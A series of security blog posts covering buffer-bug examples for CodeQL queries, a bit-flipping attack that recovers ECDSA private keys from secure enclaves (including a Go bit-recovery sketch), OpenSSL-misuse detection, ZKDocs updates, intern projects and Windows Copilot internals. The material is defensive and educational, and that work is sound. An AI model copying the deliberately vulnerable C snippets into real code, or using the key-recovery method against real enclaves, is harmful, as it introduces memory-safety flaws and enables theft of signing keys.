    if (!strncmp(argv[1], "org/tob/test/SafeData", 20)) {
        puts("Secure");
    } else {
        puts("Not secure");
    }

    Figure 10: A buffer underread bug example

    Here, the length of the "org/tob/test/SafeData" string is 21 bytes (22 if we count the terminating null byte). However, we are comparing only the first 20 bytes. Therefore, a string like "org/tob/test/SafeDatX" is incorrectly matched.

  • Buffer overread. This arises when the size argument (14 in the example below) is greater than the length of the input string, causing the function to read out of bounds.
    int check(const char *password) {
        const char pass[] = "Silmarillion";
        return memcmp(password, pass, 14);
    }

    Figure 11: A buffer overread bug example

    In the example, the length of the "Silmarillion" string is 12 bytes (13 with the null byte). If the password is longer than 13 bytes and starts with the "Silmarillion" substring, then the memcmp function reads data outside of the pass buffer. While functions operating on strings stop reading input buffers on a null byte and will not overread the input, the memcmp function operates on bytes and does not stop on null bytes.

  • Incorrect use of string concatenation function. If the size argument (BUFSIZE-1 in the example below) is greater than the source string’s length (the length of “, Beowulf\x00”, so 10 bytes), the size argument may be incorrectly interpreted as the destination buffer’s size (BUFSIZE bytes in the example), instead of the input string’s size. This may indicate a buffer overflow vulnerability.
    #define BUFSIZE 256
    
    char all_books[BUFSIZE];
    FILE *books_f = fopen("books.txt", "r");
    fgets(all_books, BUFSIZE, books_f);
    fclose(books_f);
    
    strncat(all_books, ", Beowulf", BUFSIZE-1);
    // safe version: strncat(all_books, ", Beowulf", BUFSIZE-strlen(all_books)-1);

    Figure 12: A strncat function misuse bug example

    In the code above, the all_books buffer can hold a maximum 256 bytes of data. If the books.txt file contains 250 characters, then the remaining space in the buffer before the call to the strncat function is 6 bytes. However, we instruct the function to add up to 255 (BUFSIZE-1) bytes to the end of the all_books buffer. Therefore, a few bytes of the “, Beowulf” string will end up outside the allocated space. What we should do instead is instruct the strncat to add at most 5 bytes (leaving 1 byte for the terminating \x00).

    There is a similar built-in query with ID cpp/unsafe-strncat, but it doesn’t work with constant sizes.

Missing null terminator bug in C

Both C and C++ allow developers to construct fixed-size strings with an initialization literal. If the length of the literal is greater than or equal to the allocated buffer size, then the literal is truncated and the terminating null byte is not appended to the string.

char b1[18] = "The Road Goes Ever On";  // missing null byte, warning
char b2[13] = "Ancrene Wisse";  // missing null byte, NO WARNING
char b3[] = "Farmer Giles of Ham"; // correct initialization
char b4[3] = {'t', 'o', 'b'}; // not a string, lack of null byte is expected

Figure 13: Example initializations of C strings

Interestingly, C compilers warn against initializers longer than the buffer size, but don’t raise alarms for initializers of a length equal to the buffer size—even though neither of the resulting strings are null-terminated. C++ compilers return errors for both cases.

The tob/cpp/no-null-terminator query uses data flow analysis to find incorrectly initialized strings passed to functions expecting a null-terminated string. Such function calls result in out-of-bounds read or write vulnerabilities.

CodeQL: past, present, and future

This will be a continuing project from Trail of Bits, so be on the lookout for more soon! One of our most valuable assets is our expertise in automated bug finding, and this new CodeQL repository, the Semgrep rules, and the Automated Testing Handbook are key ways we share that expertise with the community. Please use these resources, report any issues, and suggest improvements!

If you’d like to read more about our work on CodeQL, we have used its capabilities in several ways, such as detecting iterator invalidations, identifying unhandled errors, and uncovering divergent representations.

Contact us if you’re interested in customizing CodeQL queries for your project.

Say hello to the next chapter of the Testing Handbook!

11 December 2023 at 13:30

By Fredrik Dahlgren

Today we are announcing the latest addition to the Trail of Bits Testing Handbook: a brand new chapter on CodeQL! CodeQL is a powerful and versatile static analysis tool, and at Trail of Bits, we regularly use CodeQL on client engagements to find common vulnerabilities and to perform variant analysis for already identified weaknesses. However, we often hear from other developers and security professionals who struggle to get started with CodeQL. We’ve listened to the challenges that many face in writing custom CodeQL queries and integrating them into CI/CD. In response to this, we’ve tried to identify the major pain points shared across the community and write up guidance to help everyone get the most out of CodeQL.

In this latest addition to the Testing Handbook, we describe how to set up CodeQL locally and create a CodeQL database for your project. We’ll walk you through the process of writing and running custom queries and show you how to unit test and debug them. We’ll also guide you on integrating CodeQL into your existing CI/CD pipeline through GitHub code scanning. Finally, we’ve included a set of references to the official CodeQL documentation and third-party blog posts to help you find relevant, up-to-date information on all things CodeQL. Whether you’re an experienced CodeQL user or just getting started, our Testing Handbook is your entry point for harnessing the full power of CodeQL.

DARPA’s AI Cyber Challenge: We’re In!

14 December 2023 at 14:00

We’re thrilled to announce that Trail of Bits will be competing in DARPA’s upcoming AI Cyber Challenge (AIxCC)! DARPA is challenging competitors to develop novel, fully automated AI-driven systems capable of securing the critical software that underpins the modern world. We’ve formed a team of world class software security and AI/ML experts, bringing together researchers, engineers, analysts, and hackers from across our company, and have already started building our system.

Registration officially opened yesterday for the competition’s Open and Small Business Tracks. We’re planning to submit a proposal to the Small Business Track for an AI/ML-driven Cyber Reasoning System (CRS) that has been informed and shaped by our prior experience competing in DARPA’s Cyber Grand Challenge, supporting the UK Government’s Frontier AI Taskforce, and developing AI/ML-based security tools for DARPA and the US Navy.

The competition’s Program Manager, Perri Adams, hosted a streaming event to kick off registration and provide a number of technical updates. We’re particularly excited about this update because it is our first look at the challenge problems our CRS must solve and the scoring criteria that will be used to evaluate our system’s generated software patches. Check back in with us here later this month to hear our thoughts on the AIxCC’s challenges, scoring methods, and rules. In the meantime, we wish our competitors luck—but they should know that Trail of Bits is in it to win it!


A trail of flipping bits

18 December 2023 at 13:30

By Joop van de Pol

Trusted execution environments (TEE) such as secure enclaves are becoming more popular to secure assets in the cloud. Their promise is enticing because when enclaves are properly used, even the operator of the enclave or the cloud service should not be able to access those assets. However, this leads to a strong attacker model, where the entity interacting with the enclave can be the attacker. In this blog post, we will examine one way that cryptography involving AES-GCM, ECDSA, and Shamir’s secret sharing algorithm can fail in this setting—specifically, by using the Forbidden attack on AES-GCM to flip bits on a private key shard, we can iteratively recover the private key.


Trusted Enclaves

TEEs come in all shapes and sizes. They can be realized using separate secure hardware, such as Hardware Security Modules (HSM), Trusted Platform Modules (TPM), or other dedicated security chips as part of a system on chip (SoC). It’s also possible to implement them in hardware that is shared with untrusted entities, using memory isolation techniques such as TrustZone or a hypervisor. Examples in this category are secure enclaves such as Intel SGX, Amazon Nitro, etc.

One challenge secure enclaves face is that they have little to no persistent memory, so large amounts of data that need to be available across power cycles must be stored outside the enclave. To keep this data secure, it must be encrypted using a storage key that is stored either inside the trusted environment or inside an external Key Management Service (KMS) that restricts access to the enclave (e.g., through some form of attestation).

Figure 1: Design of a typical secure enclave, where encrypted data is stored outside the enclave and the data encryption key is securely stored outside the enclave in a KMS

However, because the data is stored externally, the untrusted entity interacting with the enclave will see this data and can potentially modify it. Even when using strong cryptography such as authenticated encryption—typically Authenticated Encryption with Additional Data (AEAD)—it is very difficult for the enclave to protect itself against rollback attacks, where the untrusted entity replaces the external data with an earlier version of the same data since both of them will pass authentication. A tempting solution would be to version data stored externally to the enclave, but because the enclave is stateless and doesn’t know what the latest version should be, this quickly becomes a chicken-and-egg problem. Therefore, keeping track of version numbers or usage counters in this setting is difficult, if not impossible.

Signing in a trusted enclave

One interesting application for trusted enclaves is holding digital signature private keys (such as ECDSA keys) to perform signing. If set up correctly, no one can exfiltrate the signing keys from the enclave. However, because the signing keys must be available even after a power cycle of the enclave, they must typically be stored persistently in some external storage. To prevent anyone with access to this external storage from obtaining or modifying the signing key, it needs to be encrypted using an AEAD.

Figure 2: Design for signing with a trusted enclave, where the encrypted signing key is stored outside the enclave and encrypted with a key protected and managed by a KMS

Enter everyone’s favorite AEAD: AES-GCM! Due to its brittle design, the authentication guarantees are irrevocably broken as soon as the nonce is reused to encrypt two different signing keys. Because the AES block size is limited to 128 bits and because you need 32 bits for the counter, you have only 96 bits for your nonce. No worries, though; you just have to make sure you don’t invoke AES-GCM with the same secret key using random nonces more than 2^32 times! So the enclave just has to keep track of a usage counter. Alas, as previously stated, that’s basically impossible.[1]

Figure 3: Preventing AES-GCM misuse in an enclave requires maintaining state to monitor AES-GCM usage and must prevent rollback attacks where an attacker replays an old state, though this is difficult to achieve in practice.

So an attacker can have the enclave generate an arbitrary number of signing keys, all of which it must encrypt to store them externally. Eventually, the nonce will repeat, and the attacker can recover the AES-GCM hash key using the Forbidden attack. The details are not very important, but essentially, with the AES-GCM hash key, the attacker can take any existing AES-GCM ciphertext and tag, modify the ciphertext in some way, and use the hash key to update the tag. Specifically, they can flip bits in the ciphertext, which, when decrypted by the enclave, will result in the original plaintext except that the same bits will be flipped. This is not good. But how bad is it?

Attacking ECDSA signatures

The attack is not specific to ECDSA, so understanding all the specific mathematics behind ECDSA is not required. The only important background needed to understand the attack is an understanding of how ECDSA key pairs are constructed. The private key corresponds to a number (also called a scalar) d. To obtain the corresponding public key Q, the private key is multiplied by the base point G of the specific elliptic curve you want to use.

Q = d · G

By leveraging the broken AES-GCM authentication, the attacker can flip bits in the encrypted private key and have the enclave decrypt it and use it to sign a message. As the encryption part of AES-GCM is essentially counter mode, flipping bits in the encrypted private key will cause the same bit flips in the corresponding plaintext private key.

Figure 4: By modifying the ciphertext stored in external storage, an attack can cause the secure enclave to sign messages with a modified key without having to target the enclave itself.

What happens when we flip the least significant bit of the private key? A zero bit would become a one, which is equivalent to adding one to the private key. Conversely, a one bit would become a zero, which is equivalent to subtracting one from the private key. Essentially, the effect that the bit flip has on the private key depends on the unknown value of the private key bit.

That’s great, but how can we know which of these two options happened without knowing the private key? Well, if we generate a signature with the flipped private key, we can verify the signature using a modified public key by adding or subtracting the generator. If it verifies with the added generator, we know that the private key bit was zero, whereas if it verifies with the subtracted generator, we know that the private key bit was one.

(d + 1) · G = d · G + G = Q + G

(d – 1) · G = d · G – G = Q – G

We can now repeat the process to recover other bits of the private key. Instead of adding or subtracting one, we’ll be adding or subtracting a power of two from the private key. By adding or subtracting the corresponding multiples of the generator from the public key, we learn a new bit of the private key. It’s not strictly necessary to recover one bit at a time. You can flip multiple bits and try signature verification based on all the possible effects these flipped bits can have on the private key.
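
To make the recovery step concrete, here is a minimal Go sketch of our own (not tooling from any real engagement) of how an attacker could test a single bit, assuming they already hold an ASN.1 signature that the enclave produced over a known digest with the flipped key. It uses crypto/ecdsa and math/big, with the curve taken from the public key:

// recoverBit decides whether bit i of the original private key was 0 or 1.
// pub is the unmodified public key Q; digest and sig come from the enclave
// after bit i of the encrypted private key was flipped. Illustrative code only.
func recoverBit(pub *ecdsa.PublicKey, digest, sig []byte, i uint) (bit int, ok bool) {
    curve := pub.Curve
    // Compute 2^i · G
    scalar := new(big.Int).Lsh(big.NewInt(1), i)
    gx, gy := curve.ScalarBaseMult(scalar.Bytes())

    // If the flipped bit was 0, the modified key is d + 2^i, so the signature verifies under Q + 2^i·G.
    plusX, plusY := curve.Add(pub.X, pub.Y, gx, gy)
    if ecdsa.VerifyASN1(&ecdsa.PublicKey{Curve: curve, X: plusX, Y: plusY}, digest, sig) {
        return 0, true
    }
    // If the flipped bit was 1, the modified key is d - 2^i, so the signature verifies under Q - 2^i·G
    // (the point is negated by replacing y with P - y).
    negGy := new(big.Int).Mod(new(big.Int).Neg(gy), curve.Params().P)
    minusX, minusY := curve.Add(pub.X, pub.Y, gx, negGy)
    if ecdsa.VerifyASN1(&ecdsa.PublicKey{Curve: curve, X: minusX, Y: minusY}, digest, sig) {
        return 1, true
    }
    return 0, false // the signature verified under neither candidate key
}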

Splitting the bit

Interestingly, the attack still works when the private key is split into different shards using Shamir’s secret sharing algorithm before encryption. The enclave receives the different encrypted shards, decrypts them, recombines the shards into the private key, and then signs. As a result, we cannot directly flip individual bits in the private key.

But what happens when we flip a bit in one of the shards? In Shamir’s secret sharing (see also our excellent ZKDocs article on this topic), each shard consists of a pair of x and y values that are used to interpolate a polynomial using Lagrange interpolation. The secret value is given by the value of the interpolated polynomial when evaluated at x = 0.

Flipping bits in one of the y values changes the interpolated polynomial, which corresponds to a different secret—in our case, the private key. Basically, recombining the secret corresponds to a sum of weighted y values, where each weight is a Lagrange coefficient λj that can easily be computed from the x coordinates (which are typically chosen to be consecutive integers starting from one up to the number of shards).
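
Written out, the recombined private key is d = λ1·y1 + λ2·y2 + … + λn·yn, so any change to a single share yj shows up in d scaled by that share’s Lagrange coefficient λj.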

Putting all this together, flipping bits in one of the shares adds to or subtracts from the share, depending on the value of the bit. This then results in adding or subtracting a multiple of the corresponding Lagrange coefficient λj from the private key. By generating signatures with this modified private key and validating them using modified public keys, we can recover the values of the secret shares bit by bit. After obtaining the shares, we can recombine them into the private key. All in all, this shows that the enclave operator could extract the private key from the enclave, despite all the cryptography and isolation involved.

Final bit

As this exploration of the Forbidden attack on AES-GCM in secure enclaves reveals, cryptographic primitives such as AES-GCM, ECDSA, and Shamir’s secret sharing, while generally robust, may still be vulnerable if deployed incorrectly. The complexity of TEEs and the evolving nature of adversarial methods make safeguarding sensitive data a difficult task. At Trail of Bits, we understand these challenges. Using our deep expertise in cryptography and application security, we provide comprehensive system audits, identifying potential vulnerabilities and offering effective mitigation strategies. By partnering with us, developers can better avoid potential cryptographic pitfalls and improve the overall security posture of their TEEs.
[1] You could argue that, in this toy example, the KMS could keep track of the usage counter because it controls access to the storage key. However, in practice, the KMS is usually quite limited in the type of data it can encrypt and decrypt (typically only cryptographic keys). It is likely not possible to encrypt secret key shards, for example.

Summer interns 2023 recap

20 December 2023 at 14:00

This past summer at Trail of Bits was a season of inspiration, innovation, and growth thanks to the incredible contributions of our talented interns, who took on a diverse range of technical projects under the mentorship of Trail of Bits engineers. We’d like to delve into their accomplishments, from enhancing the efficiency of fuzzing tools and improving debugger performance to exploring the capabilities of deep learning frameworks.

Xiangan He: Scalable Circom determinacy checking with Circomference

Xiangan He’s work this summer was focused on building a tool to check for missing constraints and nondeterminacy in production-scale zero-knowledge (ZK) circuits. Existing security tools for these circuits were limited in their ability to handle circuits with more than 10 million constraints, prompting the development of Circomference. Inspired by tools like Picus and Ecne, Circomference uses easily swappable SMT solver backends orchestrated by a fast Rust orchestrator and determinacy propagator to scrutinize the determinacy of larger, more complex circuits commonly encountered in real-world scenarios.

Determinacy checking is crucial for identifying bugs within zero-knowledge circuits. Xiangan’s project demonstrated that tools like Circomference and Picus could detect vulnerabilities in 98.6% of a sample of 250 ZK circuits with known vulnerabilities. Moreover, due to improved memory usage and propagation heuristics, Circomference easily handles circuits that quickly cause Picus to run out of system RAM.

Circomference not only excels in efficiency but also effectively detects nondeterminacy in circuits used in real audits, making it invaluable for ensuring the integrity and security of zero-knowledge circuits.

Michael Lin: Fuzzing event tracing for Windows (ETW)

Michael Lin embarked on a project focused on fuzzing applications that consume events using Event Tracing for Windows (ETW). ETW plays a crucial role in Windows systems, serving various components and endpoint detection and response (EDR) solutions. However, since anyone can register a provider with the correct GUID, this process is vulnerable to exploitation.

Michael’s team began by selecting interesting EDRs and reverse engineering them to identify the providers they consumed events from. Since no existing testing or fuzzing frameworks matched the complexity of inter-process communication mechanisms like ETW, they had to develop their own.

The fuzzer they created aimed to generate random events sent to these providers with the goal of uncovering parsing bugs. It encountered intriguing challenges along the way, including difficulty in bypassing Windows process protection and in tracking fuzzing progress. Nonetheless, the team successfully automated much of the process and plans to apply the approach to other applications utilizing ETW.

Matheus Borella: Enhancing GDB and pwndbg

Matheus Borella’s summer project involved making improvements to GDB and pwndbg, a GDB plugin for reverse engineering and exploit development, with a particular focus on enhancing performance and adding features.

One remarkable achievement was a significant reduction in debugger startup times for users leveraging GDB Indexes. This change demonstrated a substantial speed improvement of up to 20 times during testing. Additionally, Matheus introduced features like adding __repr__ for certain Python types and sent patches (still to be merged) that extend the Python API with custom type creation and runtime symbol addition, enhancing GDB’s debugging and reverse engineering capabilities.

Their work also brought several quality-of-life improvements to pwndbg, including experimental use-after-free detection and new commands (plist, stepuntilasm, and break-if-[not-]taken). Along the way, they even discovered and fixed a bug in QEMU that had been causing GDB crashes in certain cases.

Patrick Dobranowski: Evaluating LLMs for security

Patrick Dobranowski’s project addressed the need to assess the effectiveness of large language models (LLMs) in various domains. Patrick’s project was to create a means to more easily determine which models are good at which tasks. During development, we also noticed existing metrics fell short in topics of interest to Trail of Bits, like Solidity language comprehension. Patrick then worked to create an evaluation framework, extended from HumanEval, to assess Solidity code comprehension.

Sanketh Menda: Empowering developers with ZKDocs

Sanketh Menda worked on addressing the gap between protocols described in cryptography research papers and implementations of the same protocols. In particular, they focused on zero-knowledge proofs and contributed content on the Inner Product Argument and its applications to polynomial commitment schemes to ZKDocs, distilling these protocols into their essential implementation details.

Sanketh also worked alongside the cryptography team on security assessments of zero-knowledge-related codebases, gaining hands-on experience in the field.

Kevin Chen: Investigating PyTorch for deep learning security

Kevin Chen’s project explored the correctness and security of PyTorch, a widely used Python framework for deep learning. While PyTorch is celebrated for its simplicity and efficiency, its intricate inner workings posed questions about correctness.

Kevin initially focused on PyTorch’s automatic differentiation engine, known as autograd, which is fundamental for neural network training. His meticulous study, leveraging dataflow analysis and debuggers, concluded that PyTorch developers adhere to critical rules. Kevin’s work uncovered insights into PyTorch’s code generation practices and identified potential areas for future research.

Sameed Ali: A fuzzer that actually follows directions!

In the realm of directed fuzzing, where tools use metrics like shortest-path-to-target(s) to discover specific code locations, Sameed’s work stands out. His project extended LibAFL to create a fuzzer that can genuinely follow directions and generates inputs that satisfy a sequence of preconditions.

Traditional reachability metrics often fall short in capturing the complexity of real-world bugs, as exploits often require a specific sequence of preconditions to be satisfied. Sameed’s innovative approach takes a sequence of targets and dynamically updates the shortest-path-to-target metric calculation as progress is made. This approach allows the fuzzer to generate inputs that hit more complex bugs, significantly advancing the state of the art in directed fuzzing.

Apply to our intern program!

The dedication and innovation of our interns underscore Trail of Bits’ commitment to advancing cybersecurity and technology. It was such a pleasure to work with the Summer Interns cohort this year, and we can’t wait to see what they accomplish next.

We’ll be opening up our Summer Interns application process in January next year!

Catching OpenSSL misuse using CodeQL

22 December 2023 at 14:00

By Damien Santiago

I’ve created five CodeQL queries that catch potentially potent bugs in the OpenSSL libcrypto API, a widely adopted but often unforgiving API that can be misused to cause memory leaks, authentication bypasses, and other subtle cryptographic issues in implementations. These queries—which I developed during my internship with my mentors, Fredrik Dahlgren and Filipe Casal—help prevent misuse by ensuring proper key handling and entropy initialization and checking if bignums are cleared.

To run our queries on your own codebase, you must first download them from the repository using the following command:

codeql pack download trailofbits/cpp-queries

To run the queries on a pre-generated C or C++ database using the CodeQL CLI, simply pass the name of the query pack to the tool as follows:

codeql database analyze database.db \
    --format=sarif-latest        \
    --output=./tob-cpp.sarif -- trailofbits/cpp-queries

Now, with that out of the way, let’s dig into the actual queries I wrote during my internship.

Oh no, not my keys!

Using a too-short key when initializing a cipher using OpenSSL can lead to a serious problem: the OpenSSL API will still accept this key as valid and simply read out of bounds when the cipher is initialized, potentially initializing the cipher with a weak key and leaving your data vulnerable. For this reason, we decided to make a query that tested for too-short keys by checking the key size against the algorithm being used. Fortunately for us, OpenSSL uses a naming scheme that makes it easy to implement this query. (More on that later.)

Below is the definition of the function EVP_EncryptInit_ex, which is used to initialize a new symmetric cipher.
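
(The prototype below is reproduced from the OpenSSL EVP API headers.)

int EVP_EncryptInit_ex(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *type,
                       ENGINE *impl, const unsigned char *key,
                       const unsigned char *iv);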

Notice how the function takes the key as the fourth argument. With this in mind, we can define a Key type in CodeQL using data flow analysis: if there is data flow from a variable into the key parameter of EVP_EncryptInit_ex, the variable most likely represents a key (or, at the very least, is used as one). Thus, we can define what a key is in CodeQL as follows:

Here, we use data flow to ensure that the key flows into the key parameter of a call to EVP_EncryptInit_ex. This works since the statement containing the cast will evaluate to true only if init satisfies the CodeQL definition of EVP_EncryptInit_ex (i.e., if it represents a call to a function with the name EVP_EncryptInit_ex). The call to getKey() simply returns the position of the key parameter in the call to EVP_EncryptInit_ex.

Next, we need to be able to evaluate the size of a key using CodeQL. In order to check if a given key has the correct size, we need to know two things: the size of the key and the key size of the cipher the key is passed to. Obtaining the size of the key is simple, as CodeQL has a getSize() predicate that returns the size of the type in bytes. The call to getUnderlyingType() is used to resolve typedefs and get the underlying type of the key.

Now, we need to identify what the size of the key should be. This clearly depends on which cipher that is used. However, CodeQL doesn’t know what a cipher is. In OpenSSL, each cipher exposed by the high-level EVP API is an instance of the type EVP_CIPHER, and each cipher is initialized using a particular function from the API. For example, if we want to use AES-256 in CBC-mode, we pass an instance of EVP_CIPHER returned from EVP_aes_256_cbc() to EVP_EncryptInit_ex. Since the API name contains the name of the cipher, we can use the getName() and matches() predicates in CodeQL to compare the names of function calls to patterns in the names of the ciphers.

Since the cipher is given by (the return value of) a function call, and we want to match against the name of the target function, we need to use getTarget() to get the underlying target of the call. To constrain the key size of the cipher, we add a field for the key size and constrain the value of the field in the constructor.

Next, we need to check if the key passed to the cipher is equal to the expected size. However, we have to be careful and check that the cipher we’re comparing against is actually used together with the key, as opposed to grabbing some random cipher instance from the codebase. Let’s first define a member predicate on the Key type that checks the size of the key against the key size of a given cipher.

As we have noted, this predicate does not restrict the cipher to ensure that the key is used together with the cipher. Let’s add another predicate to Key that can be used to obtain all ciphers that the key is used together with. This means that the cipher is passed as a parameter in the call to EVP_EncryptInit_ex where the key is used. (Note that the key may be used with different ciphers in different locations in the codebase.)

That’s it! The final query, as well as a small test case to demonstrate how the Key and EVP_CIPHER types work, can be found on GitHub.

My engine’s falling apart!

OpenSSL 1.1.1 supports dynamic loading of cryptographic modules called engines at runtime. This can be used to load custom algorithms not implemented by the library or to interface with hardware. However, to be able to use an engine, it must first be initialized, which requires the user to call a few different functions in a specific order. First, you must select an engine to load, call the engine initialization function, and then set the mode of operation for the engine. Failing to initialize the engine could potentially lead to invalid outputs or segmentation faults. Failing to set the engine as the default could mean that a different implementation is used by OpenSSL. To create a query to detect if a loaded engine is properly initialized, we decided to use data flow to check if the correct functions were called to initialize the loaded engine.
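
For reference, a correct initialization sequence looks roughly like this sketch (error handling uses a hypothetical handle_error() helper, and the engine ID is illustrative):

ENGINE_load_builtin_engines();
ENGINE *e = ENGINE_by_id("example-engine");     /* 1. select an engine to load */
if (e == NULL || !ENGINE_init(e))               /* 2. initialize and sanity-check the engine */
    handle_error();
if (!ENGINE_set_default(e, ENGINE_METHOD_ALL))  /* 3. register it as the default implementation */
    handle_error();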

After reading the documentation on the OpenSSL engine API, it seems that the API user can create an engine object in a few different ways. We decided to write a CodeQL class that simultaneously captured the four different functions a user could use to load a new engine. (These functions either create a new unselected instance, create a new instance selected by ID, or select an engine from a list using “previous” and “next” style function names.)

Next, we needed to check that the user initialized the newly created engine object using ENGINE_init, which takes the engine object as a parameter. Not only does this function initialize the engine, it also performs error checking to make sure the engine is working properly. As a result, it’s important that the user does not forget to call this function.

The third and final function that the user needs to call is ENGINE_set_default, which is used to register the engine as the default implementation of the specified algorithms. ENGINE_set_default takes an engine and a flag parameter. We create a CodeQL type that represents this function, just as we did for ENGINE_init above.

Now that we have defined the functions used to initialize a new engine using CodeQL, we need to define what the corresponding data flow should look like. We want to make sure that data flows from CreateEngine to ENGINE_init and ENGINE_set_default.

To finalize this query and put it all together, we flag if a loaded engine is not passed to either ENGINE_init or ENGINE_set_default. The complete query and a corresponding test case can be found on GitHub.

Moving forward

The OpenSSL libcrypto API is full of sharp edges that could create problems for developers. As with every cryptographic implementation, the smallest of mistakes can lead to serious vulnerabilities. Tools such as CodeQL help shine a light on these issues by allowing developers and code reviewers the opportunity to build and share queries to secure their code. I invite you not only to try out our queries found in our GitHub repository (which also contains additional queries for both Go and C++), but to open your IDE of choice and create some of your own amazing queries!

We’ve added more content to ZKDocs

26 December 2023 at 14:00

By Jim Miller

We’ve updated ZKDocs with four new sections and additions to existing content. ZKDocs provides explanations, guidance, and documentation for cryptographic protocols that are otherwise sparingly discussed but are used in practice. The four new sections detail common protocols that previously lacked implementation guidance: the inner product argument (IPA), Pedersen commitments, the IPA-based polynomial commitment scheme, and the KZG polynomial commitment scheme.

We’ve also added a new subsection to our random sampling section that details an effective random sampling technique known as wide modular reduction. This technique is well known in certain cryptographic circles but to our knowledge has not been widely publicized.

This post summarizes each of these additions at a high level.

ICYMI: What is ZKDocs? Almost two years ago, we first released our website ZKDocs to provide better implementation guidance for non-standard cryptographic protocols. ZKDocs provides high-level summaries, protocol diagrams, important security considerations, and more for common non-standardized cryptographic protocols, like zero-knowledge proofs.

The inner product argument (IPA)

If you follow the cryptographic world, you may have heard of Bulletproofs, a type of zero-knowledge proof that has become popular in recent years. Despite their popularity, few people actually understand how these proofs actually work in detail because they are quite complicated! To get a sense for their complexity, check out this excellent protocol diagram from the dalek cryptography Bulletproofs implementation:

Bulletproofs protocol diagram (source)

The fundamental building block of Bulletproofs is the IPA. Like most cryptographic protocols, the IPA and Bulletproofs are so complex because they have been iteratively improved and refined over many years by theorists. The finished protocol is difficult to understand without the prior context of previous, simpler iterations. Fortunately, our new section in ZKDocs breaks down the IPA into simpler constructions and shows how these improvements can be made to achieve the final protocol being used today. Like all of ZKDocs, this section contains helpful protocol diagrams and important security considerations.
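
(For context, the IPA lets a prover convince a verifier that two committed vectors a and b satisfy ⟨a, b⟩ = c for a claimed value c, with communication that grows only logarithmically in the length of the vectors.)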

Commitment schemes

The concept of cryptographic commitment schemes is relatively intuitive: one person, the committer, first produces a cryptographic commitment that hides some secret value from all other observers, and then at a later time opens the commitment to reveal this value. For secure schemes, the commitment does not leak any information about the secret, and it’s impossible for the committer to equivocate on what this secret value was. The traditional commitment scheme allows the committer to commit to and reveal a specific value, usually an integer modulo a prime number.

Polynomial commitments are a generalization of scalar commitment schemes and an important building block in zero-knowledge protocols. Polynomial commitment schemes (PCSs) allow one party to prove to another the correct evaluation of a polynomial at some set of points, without revealing any other information about the polynomial.

We’ve updated ZKDocs with an explanation of the most common commitment scheme, Pedersen commitments, as well as of two common PCSs: the IPA PCS (derived from the IPA) and the KZG PCS.
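
(In elliptic-curve notation, a Pedersen commitment to a value m with blinding factor r is C = m·G + r·H, where G and H are independent generators; the committer opens it by revealing m and r.)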

Wide modular reduction

Many aspects of cryptography often deal with random values and prime numbers; a common requirement for various protocols is needing to generate a random value between 0 and p for some prime p. While this may sound relatively straightforward, in practice it is tricky to do securely.

The problem is that computers deal with bits and bytes. Typically, random number generators will produce a random number between 0 and 2^n, where n is the number of requested random bits. Unfortunately, 2^n is not a prime number and therefore cannot be directly used to generate a value between 0 and p for some p. This fundamental mismatch causes many people to generate their random numbers using the following obvious, simple, and INSECURE METHOD, which we detail in ZKDocs:

Insecure random sampling mod p (source)

ZKDocs documents a few different techniques to avoid the modulo bias described in the figure above. The nicest technique is known as wide modular reduction, and the concept is simple: if you have a prime p that has k bits, then generate a (k + 256)-bit random value (where 256 is a security parameter that can be tuned) and then reduce it mod p. (Note that this will also work with composite moduli, so p does not even have to be prime, but we use a prime since it is a common example). If you’re curious why this method is secure, the newest addition to ZKDocs breaks down the statistical argument as to why that’s the case.
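
In code, the technique takes only a few lines. Here is a sketch of our own in Go (function and variable names are illustrative; crypto/rand and math/big do the work), shown with a prime modulus even though the same approach works for composite moduli:

// sampleModP returns a value in [0, p) that is statistically close to uniform:
// it samples 256 extra random bits and reduces, making the modulo bias negligible.
func sampleModP(p *big.Int) (*big.Int, error) {
    widthBytes := (p.BitLen()+7)/8 + 32 // k bits of p, plus 256 extra bits
    buf := make([]byte, widthBytes)
    if _, err := rand.Read(buf); err != nil { // crypto/rand
        return nil, err
    }
    wide := new(big.Int).SetBytes(buf)
    return wide.Mod(wide, p), nil
}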

We need your help!

We want to actively maintain and grow the content of ZKDocs. To make ZKDocs as effective as possible, we want to ensure that new content is helpful to the community. If you enjoy ZKDocs, please let us know what other content you’d like us to add! The best way to let us know is by raising an issue directly on the ZKDocs GitHub page.

AI In Windows: Investigating Windows Copilot

27 December 2023 at 14:00

By Yarden Shafir

AI is becoming ubiquitous, as developers of widely used tools like GitHub and Photoshop are quickly implementing and iterating on AI-enabled features. With Microsoft’s recent integration of Copilot into Windows, AI is even on the old stalwart of computing—the desktop.

The integration of an AI assistant into an entire operating system is a significant development that warrants investigation. In this blog post, I’d like to share the results of my brief investigation into how Microsoft has integrated Copilot into its legacy desktop system. I’ll summarize some key features of the integration and explore some of the concerns and future considerations of the role of AI in desktop environments.

Some caveats

Before we get into the details, there are two important caveats to keep in mind.

First, and most importantly, Microsoft Copilot works only with a functioning internet connection. This tells us that the models in use are hosted, not local, and that by necessity, some data from your machine is sent to Microsoft whenever AI features are used.

Second, as with other AI-enabled tools, Copilot’s results aren’t always stable or reliable. The fact that Copilot can give you something unexpected takes some getting used to and requires an initial trial-and-error period to discover what works and what doesn’t. This implies that even well-resourced public deployments of generative AI have not sufficiently mitigated the hallucination problem.

Copilot in Windows

In the most recent Windows 11 release, Microsoft officially introduced Windows Copilot—an everyday AI companion that exists on the desktop and is ready to answer any question. According to Microsoft,

Copilot will uniquely incorporate the context and intelligence of the web, your work data and what you are doing in the moment on your PC to provide better assistance – with your privacy and security at the forefront.

On Windows builds that support Copilot, you’ll be able to see a new desktop icon that opens a side pane to the Copilot interface:

While this pane may look brand new, under the surface it is simply a view into Microsoft Edge running Bing AI inside an msedge.exe process. However, Copilot does include some new features and abilities beyond what “regular” Bing AI can do.

Just like Bing AI, Copilot does not have a local AI model. All queries and operations are done via a web interface to remote machines that process requests and return answers. Therefore, Copilot requires an active internet connection to function. Copilot will search its own knowledge base or access the web to give you answers to any questions you ask (and just like with any LLM, those answers may be confidently incorrect). By default, Copilot will perform only general web queries and won’t access any user data or data related to the current web session. However, even in that default state, Copilot does have access to metadata provided by the browser and operating system, such as the IP address, location (as provided by the browser), and preferred language.

An optional setting (which is disabled by default) allows Copilot to access the current browser session to collect information about the URLs and titles of the currently open web pages and the content of the active web page. It should not have access to any private data such as passwords or browser history.

Copilot comes with other capabilities beyond the ability to answer basic queries. The first is an integration with DALL-E to generate AI art. You can access this feature through general requests to Copilot or by typing #graphic_art(“prompt”). For example, typing #graphic_art(“tree”) will generate a picture of a tree.

